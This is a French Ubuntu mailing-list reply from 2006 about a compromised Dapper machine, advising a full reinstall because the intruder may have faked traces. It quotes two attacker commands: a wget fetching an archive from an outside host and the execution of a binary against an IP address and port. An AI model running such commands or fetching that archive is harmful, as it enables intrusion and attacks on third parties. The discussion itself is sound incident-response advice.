Re: Sécurité Compromise dans UBUNTU dapper???

Patrice Karatchentzeff patrice.karatchentzeff at gmail.com
Mar 28 Mar 09:29:31 BST 2006


Le 28/03/06, Free Mind<fr33mind at gmail.com> a écrit :
> On 3/27/06, L. Boggio <l.boggio.kubuntu-fr at adonf.info> wrote:

[...]

> > Bon, désolé, mais avec ces 2 lignes :
> >
> > wget http://rooot.xhost.ro/fld.tgz
> > et
> > ./x 200.68.192.253 53 0
> >
> > On a la preuve qu'il a téléchargé un programme et qu'il l'a exécuté,
> > donc, tu ne peux pas savoir ce qu'il a fait.
> > De ce fait, tu ne peux plus rien croire dans ta machine : LS a pu être
> > remplécé, PS a pu être remplacé, etc...
> > Si tu es parano et/ou que tu as des choses sensibles, la SEULE solution
> > sure est la réinstallation après formatage de ta machine :(
>
>
>
> Je pense que je l'ai interrompu et qu'il était au début du processus et en
> effet, les scripts sont lisibles... donc je vais plutôt tenter d'analyser ce
> qu'il y a la dedans.

Je suis allé zieuté les scripts des sites aimablements laissés en
ligne par le crétin en question. Pour le moment, il n'a pas l'air
d'avoir eu le temps de faire quelque chose.

**MAIS** rien ne t'assure qu'il ne s'agit pas d'un hameçon laissé là
pour te faire croire autre chose. Si le gars est vicieux, il peut très
bien avoir transformé ton history - et les traces ad hoc - pour
laisser croire qu'il n'a pas eu le temps de faire quelque chose.

La **SEULE** solution sure est de réinstaller la machine (mais rien ne
t'empêche de jouer avec pour tenter de remonter la piste);

La sécurité, c'est être paranoïaque.

PK

--
      |\      _,,,---,,_       Patrice KARATCHENTZEFF
ZZZzz /,`.-'`'    -.  ;-;;,_   mailto:p.karatchentzeff at free.fr
     |,4-  ) )-,_. ,\ (  `'-'  http://p.karatchentzeff.free.fr
    '---''(_/--'  `-'\_)




Plus d'informations sur la liste de diffusion ubuntu-fr